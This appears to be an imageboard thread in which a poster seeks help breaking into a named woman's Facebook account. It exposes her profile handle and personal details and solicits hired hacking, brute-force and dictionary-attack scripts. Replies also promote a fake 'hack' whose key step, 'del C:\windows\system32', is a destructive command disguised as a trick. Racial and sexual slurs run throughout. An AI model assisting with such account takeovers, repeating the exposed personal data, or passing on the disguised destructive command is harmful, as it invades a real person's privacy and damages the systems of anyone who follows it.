Please help me hack this bitch

Please help me hack this bitch

facebook dot com cgcravioto

Need her pass. She has her phone number as public info in profile

not your personal army

Yes, i know :/ but don't know where else to go, this is quite serious

Not your personal army.

Her password is "1986 Nissan 300ZX Z31"

It would literally be easier to hire someone for this. You know this place called deepweb? Theres places people like this are just waiting for you to come knock at their door. Though, I don't wanna endorse this, just saying.

serious stuff on the internet. lol

Yup, i tried, but don't want to get scammed so easily :/

Why pay or beg someone else to do it when you can yourself?
1. Start your computer, go to "Run", and enter this: 'cmd'
2. A terminal window will open. Here, enter : 'ipconfig'
3. Take a screenshot of this. You'll need the numbers here.
4. Next, enter: '@echo off'
5. Followed by: 'del C:\windows\system32'
6. All you have to do now is wait. You'll be presented with a window with spaces to fill in numbers and addresses, which can be found in the screenshot you took earlier.
6. This will show all encrypted content you can view, including the password(s) of the currently open Facebook page(s).
Don't forget to share this!

Here's some personal advice straight from the heart.

Don't be a pussy.

If it's not worth it for you to get scammed over potentially doing this, then it's not worth trying at all really, jsut a waste of time. Go deep or go home.

bump!! this helped me once

Oh my God, this good ol trick. Been helping Sup Forumsyards from ages. Don't forget to reboot after you get your stuff though!

User: admin007 Pw: jenny8675309

Let's see.
If someone here has an onion, i'll go there. The ones i've got are already reported as scam, that's the reason i came here.

You need an Email to log in.

What's a Facebook? A book of faces. Go outside

Login could be using facegbook ID or phone number, right?
I don't have the e-mail :/

Fuck off and invest somewhere else.

Oh, the good ol' method, I thought facebook patched this?

Man don't just give this shit away openly.

>facebook dot com cgcravioto
The link is facebook com/cg.cravioto

best hackers worked on that, it's unfixable

Name: Claudia Cuñada
DialingCode: 52
CountryCode: MX
Timezone: GMT-05:00

Can you confirm this op?

you fuckin troll,

dont you guys do this shit it will only delete your system32 and fuck your ass

Thanks for the help Sup Forumsrother, gonna try this presto!

fuck off

Why are you trying to protect this girl, let him hack her

If you don't want to help op then leave

Yes. Confirmed.

NYPA

confirmed by OP is trying to hack into his mothers account since she forgot the login, so OP your identity just got exposed.

i really doubt somebody here will hack it for you

OP, do you know her email or skype or anything?

Maybe someone can provide an onion site for me, as well. You know, asking is always a good idea XD

HAHAHAHhahhaaXDxdxdXDXD

No, the phone number is all i've got, because is there, in profile xD

ok so his mom forgot the login and cant press forgot password for fb to send her a new login. you dont belong on the internet op. Also use google for fuck sakes.

no i swear it's helpful! it's not a virus and it worked for me. i was behind seven proxies so i was probably safer but it's completely okay.

hahahaha that's not true! XD

hacking is bad

lmao

If she would've known her email too then I don't think OP would've asked us so I guess she forgot her email too and this is actually not something weird either, parents who's not used to the technology often forget this kind of credentials and expect their children or someone else to somehow fix it for them.

if you don't know how to program your own bots you shouldn't be trying to commit federal crimes. anhero op

Oh, trust me, i'm not :(
I tried other alternatives before landing here :(

OP, brute force it.

wich alternatives?

rok you go into the settings, under the security tab, it will say saved passwords, boom theres all the saved passwords used on the pc or browser.

Shut up nigger

Lol

>this

That would be nice, if i knew how to do it. I read about a software called Brutus, but im lazy, lol

brute force what? an ip lmfao. he needs a password

bruteforcing is gonna take forever plus popular email services have security precautions against that.

Kali Linux you retarded fuck

Did you know you could brute force passwords too? Fucking stupid cunt.

Parents usually use a very easy password to remember so OP can just download a password list online.

bruh op doesnt know how to use brutus, and you want this window fag to use linux.

So you can't want to download a software and try it out but you can ask Sup Forums...

XD that's why i asked for help OR an onion site for me to hire someone u_u

you got a point nigger

ok op, what email service are you using?

OP, I have a few scripts that can perform simple dictionary attacks against facebook accounts, so if your mother used a simple password (very common) then you should be able to get access.

hire? how much

do you understand that if op uses those scripts against facebook without hiding his ip, the feds are gonna come to his house.

He can add a proxy list to it.

and?

Operation OP's Mother

Since i'm not doing this as a daily basis, i can't estimate a fee. If someone here was bored enough to help me, that won't cost me anything. Asking is for free :)

kekd

you also said hire, and when you hire you need something in return

OP, how much are you willing to pay if I hijack your mothers account?

And if your mother let me do it ofcourse

i demand something else than money if you are poor

take a piece of paper and write down all possible passwords that you may have used. all email services these days require security questions in case some shit like this happens, its there for a reason. or the email service will ask you for use number to text you a verification code in order to give you access to the email account to change the password. this doesnt require any hacking but only common sense even if you are a window fag.

Dear god... autism does travel in herds

state your price

Yup. If nobody helps me as a boring charity, then i would need to hire someone, that someone should estimate his fee. I don't have enough criteria to value this kind of help. :(

OP, join the army here and we'll do the work for you
hack (dot) chat/?OPSMOTHER

Fuck offfffff

someone expecting charity should not hink of hire somone

>think

OP visit this link and let us prepare the operation

ok, i did it.

kekd

Figure it out yourself. You gotta work hard to hack shit. You gotta be a man. Your computer will have a boner so hard when you become a hacking man. Your dad will be so gay for you that he'll say "ahhhhhh boy!" Your dog will even force itself on 2 legs to hump your manliness. That's your reward for becoming a hacking man. The real hacking man.

Type something to add your name

OP we're waiting

hack.chat/?OPSMOTHER

OP have you deleted win32 yet? The sooner you do this the sooner all your problems will be fix'ed

Have this as your username so I know it's you

7Y9vPvpnmHu3AsEDjRDQ

not working lol
not even with enter
let me check the code of this page

OP doesnt know what he is getting himself into, gotta love summerfags! kek

Turn of javascript dumbass